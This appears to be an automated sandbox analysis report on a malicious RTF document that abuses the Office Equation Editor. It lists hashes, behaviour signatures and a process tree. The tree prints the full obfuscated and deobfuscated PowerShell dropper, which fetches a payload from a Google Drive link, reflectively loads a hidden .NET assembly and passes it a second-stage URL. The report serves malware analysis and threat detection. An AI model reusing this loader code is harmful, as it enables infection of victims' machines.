Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    06-11-2024 06:49

General

  • Target

    xBA TM06-Q6-11-24.rtf

  • Size

    354KB

  • MD5

    d0f2558af01fafc92df8d82c60deb2bf

  • SHA1

    a940bde8c8841e05199fa545fa521441f474d09a

  • SHA256

    af5bc41229045ab88d9c81992fdb442eb814a9cd765e8172480641359b44b6be

  • SHA512

    76bea085c98d8350fa1fbbd9f64297ef215252e7ad6dd05ee124a7ddcbbc0c49518fe1841776a56d0feed156c6a880dbce306bbdc59529175dd5a29185053be7

  • SSDEEP

    3072:A1LnrgVqOj/5cAsFNM8AaG1mryxZB/0LuQIeavuFbKrppVNxd8vMW:A17OjhctN6uiBpJ2KTXxd8vMW

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\xBA TM06-Q6-11-24.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2036
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2200
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\uthghgjhiu.vbs"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbGRzaW1hZ2VVcmwgPSAnKydhRDlodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBhRDk7bGRzd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtsZHMnKydpbWFnZUJ5dGVzID0gbGRzd2ViQ2xpZW50LkRvd25sb2FkRCcrJ2F0YShsZHNpbWFnZVVybCk7bGRzaW1hZycrJ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcobGRzaW1hZ2VCeXRlcyk7bGRzc3RhcnRGbGFnID0gYUQ5PDxCQVNFNjRfU1RBUicrJ1Q+PmFEOTtsZHNlbmRGbGEnKydnID0gYUQ5PDxCQVNFNjRfRU5EPj5hRDk7bGRzcycrJ3RhcnRJbmQnKydleCA9IGxkc2ltYWdlVGV4dC5JbmRleE9mKGxkc3N0YXInKyd0RmxhZyk7bGRzZW5kSW5kZXggPScrJyBsZHNpbWFnZVRleHQuSW5kZXhPZihsZHMnKydlbmRGbGFnKTtsZHNzdGFydEluZGV4IC1nZSAwIC1hbmQgbGRzZW5kSW5kZXggLWd0IGxkc3N0YXJ0SW5kZXg7bGRzc3RhcnRJbmRleCArPSBsZHNzJysndGFydEZsYWcuTGVuZ3RoO2xkc2Jhc2U2NEwnKydlbmd0aCA9IGxkc2VuZEluZGV4IC0gbGRzc3RhcnRJbmRleDtsZHNiYXNlNjRDb21tYW5kID0gbGRzaW1hZ2VUZXh0LlN1YnN0cmluZyhsZHNzdGFydEluZGV4LCAnKydsZHNiYXNlNicrJzRMZW5ndGgpO2xkc2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKGxkc2Jhc2U2NENvbW1hJysnbmQuVG9DaGFyQXJyYXkoJysnKSBrajggRm9yRWFjaC1PYmplY3QgeyBsZHNfIH0pWy0xLi4tKGxkc2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07bGRzY29tbWFuZEJ5dGVzID0nKycgW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhsZHNiYXNlNjRSZXZlcnNlZCk7bGRzbG9hZGVkQXNzZW1ibHkgPSBbU3lzdCcrJ2VtLlJlZmwnKydlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGxkc2NvbW1hbmRCeXRlcyk7bGRzdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLicrJ0dldE1ldGhvZChhRDlWQUlhRDkpO2xkc3ZhaU1ldGhvZC5JbnZva2UobGRzbnVsbCwgQChhRDl0eHQuZHN0ZXAvcG9wL3VlLnByZ3hhbXlncmVuZS5naWcvLzpzcHR0aGFEOSwgYUQ5ZGVzYXRpdmFkb2FEOSwgYUQ5ZGVzYXRpdmFkb2FEOScrJywgYUQ5ZGVzYXRpdmFkb2FEOSwgYUQ5ZGVzYXRpdmFkb2FEOSwnKycgYUQ5MWFEOSwgYUQ5ZHhkaWFnYUQ5LCBhRDlkZXNhdGl2YWRvYUQ5LCBhRDlkZXNhdGl2YScrJ2RvYUQ5LGFEOWRlc2F0aXZhZG9hRDksYUQ5ZGVzYXRpdmFkb2FEOSxhRDlkZXNhdGl2YWRvYUQ5LGFEOTFhRDksYUQ5ZGVzYXRpdmFkb2FEOSkpOycpICAtY3JFUGxBQ2UgJ2xkcycsW0NIYXJdMzYgIC1yZVBMQWNlKFtDSGFyXTk3K1tDSGFyXTY4K1tDSGFyXTU3KSxbQ0hhcl0zOSAgLWNyRVBsQUNlICdrajgnLFtDSGFyXTEyNCkgfC4gKCAkZW52OmNPbVNQRUNbNCwyNCwyNV0tSm9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2676
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('ldsimageUrl = '+'aD9https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 aD9;ldswebClient = New-Object System.Net.WebClient;lds'+'imageBytes = ldswebClient.DownloadD'+'ata(ldsimageUrl);ldsimag'+'eText = [System.Text.Encoding]::UTF8.GetString(ldsimageBytes);ldsstartFlag = aD9<<BASE64_STAR'+'T>>aD9;ldsendFla'+'g = aD9<<BASE64_END>>aD9;ldss'+'tartInd'+'ex = ldsimageText.IndexOf(ldsstar'+'tFlag);ldsendIndex ='+' ldsimageText.IndexOf(lds'+'endFlag);ldsstartIndex -ge 0 -and ldsendIndex -gt ldsstartIndex;ldsstartIndex += ldss'+'tartFlag.Length;ldsbase64L'+'ength = ldsendIndex - ldsstartIndex;ldsbase64Command = ldsimageText.Substring(ldsstartIndex, '+'ldsbase6'+'4Length);ldsbase64Reversed = -join (ldsbase64Comma'+'nd.ToCharArray('+') kj8 ForEach-Object { lds_ })[-1..-(ldsbase64Command.Length)];ldscommandBytes ='+' [System.Convert]::FromBase64String(ldsbase64Reversed);ldsloadedAssembly = [Syst'+'em.Refl'+'ection.Assembly]::Load(ldscommandBytes);ldsvaiMethod = [dnlib.IO.Home].'+'GetMethod(aD9VAIaD9);ldsvaiMethod.Invoke(ldsnull, @(aD9txt.dstep/pop/ue.prgxamygrene.gig//:sptthaD9, aD9desativadoaD9, aD9desativadoaD9'+', aD9desativadoaD9, aD9desativadoaD9,'+' aD91aD9, aD9dxdiagaD9, aD9desativadoaD9, aD9desativa'+'doaD9,aD9desativadoaD9,aD9desativadoaD9,aD9desativadoaD9,aD91aD9,aD9desativadoaD9));') -crEPlACe 'lds',[CHar]36 -rePLAce([CHar]97+[CHar]68+[CHar]57),[CHar]39 -crEPlACe 'kj8',[CHar]124) |. ( $env:cOmSPEC[4,24,25]-JoIn'')"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1268

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      bdc5564e08a79ce12e0a192a8c7713f9

      SHA1

      0ca6b185b465ff7e546cea9ede812a8bd0d69eda

      SHA256

      34cfffd71b58709e39bddac0c52e4a7d54e1a21cf56c7242a85b0cabeba5b6f1

      SHA512

      3f7e2c7712ee52225807820db043d0de61ea1233dd1b6662e8df3fcfc07fbd1acafd47a3d0440be987cf5f83721b628e046f3682c784d566f4913a292512b889

    • C:\Users\Admin\AppData\Roaming\uthghgjhiu.vbs

      Filesize

      68KB

      MD5

      db28d13cc2983de1b94ee9acddc17cb4

      SHA1

      44cf8e7b24455cbcc9d3ffe9c4624ba08ac0958a

      SHA256

      bb18e892a74e8180a2f97c99c3889090ad34d59e0803376205429049b2c296fb

      SHA512

      420e6cc259e5ce0e05a785cec58436b19090ba7e6bfb379cc66fe0cb7b4fda02cb6f163cd9af735150060b7a9565a0a738f5d2057855df73b6121d72cd9aacf6

    • memory/1268-20-0x00000000051A0000-0x00000000051D8000-memory.dmp

      Filesize

      224KB

    • memory/1268-22-0x00000000051E0000-0x000000000521D000-memory.dmp

      Filesize

      244KB

    • memory/1268-21-0x00000000050E0000-0x00000000050F7000-memory.dmp

      Filesize

      92KB

    • memory/3040-0-0x000000002FE31000-0x000000002FE32000-memory.dmp

      Filesize

      4KB

    • memory/3040-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3040-2-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/3040-19-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB